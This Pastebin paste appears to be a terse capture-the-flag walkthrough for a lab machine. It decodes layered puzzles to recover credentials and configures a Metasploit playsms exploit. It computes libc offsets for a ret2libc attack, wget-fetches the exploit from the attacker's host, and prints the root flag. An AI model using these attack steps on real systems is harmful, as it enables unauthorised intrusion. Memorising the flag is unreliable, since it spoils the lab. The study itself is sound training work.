Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if ( username == "admin" && password == "superduperlooperpassword_lol"){
- DECODE
- ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
- DECODE
- {p:7901324502264899236349230781143813838831920474669364339844939631481665770635584819958931021644265960578585153616742963330195946431321644921572803658406281,q:12802918451444044622583757703752066118180068668479378778928741088302355425977192996799623998720429594346778865275391307730988819243843851683079000293815051,dp:5540655028622021934429306287937775291955623308965208384582009857376053583575510784169616065113641391169613969813652523507421157045377898542386933198269451,dq:9066897320308834206952359399737747311983309062764178906269475847173966073567988170415839954996322314157438770225952491560052871464136163421892050057498651,c:62078086677416686867183857957350338314446280912673392448065026850212685326551183962056495964579782325302082054393933682265772802750887293602432512967994805549965020916953644635965916607925335639027579187435180607475963322465417758959002385451863122106487834784688029167720175128082066670945625067803812970871}
- DECODE BASE64 INTO A ZIP FILE
- UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA
- USE FCRACKZIP TO CRACK THE ZIP FILE PASSWORD
- username = admin && password = superduperlooperpassword_lol
- DECODE BASE64
- KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
- KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
- K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
- LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
- DECODE BRAINFUCK ESOTERIC PROGRAMMING LANGUAGE
- +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
- ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
- ++..<
- idkwhatispass
- http://10.10.10.111:9999/playsms
- Login is admin
- pass is idkwhatispass
- Us metasploit module exploit/multi/http/playsms_uploadcsv_exec
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PASSWORD idkwhatispass yes Password to authenticate with
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOST 10.10.10.111 yes The target address
- RPORT 9999 yes The target port (TCP)
- SSL false no Negotiate SSL/TLS for outgoing connections
- TARGETURI /playsms/index.php?app=main&inc=feature_sendfromfile&op=list yes Base playsms directory path
- USERNAME admin yes Username to authenticate with
- VHOST no HTTP server virtual host
- RUN THIS COMMAND TO FIND LIBC ADDRESS
- GET SYSTEM OFFSET
- readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
- 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
- GET EXIT OFFSET
- readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
- 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
- strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
- 15ba0b /bin/sh
- GET ARGUMENT
- strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
- 15ba0b /bin/sh
- LIBC LOCATION
- ldd rop | grep libc
- libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
- DOWNLOAD EXPLOIT TO FROLIC
- python -m SimpleHTTPServer
- wget http://10.10.14.5:8000/ropExploit/py
- RUN EXPLOIT
- cd /home/ayush/.binary
- ./rop $(python /var/www/html/ropExploit.py
- PWN ROOT
- cd root
- cat root.txt
- 85d3fdf03f969892538ba9a731826222
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement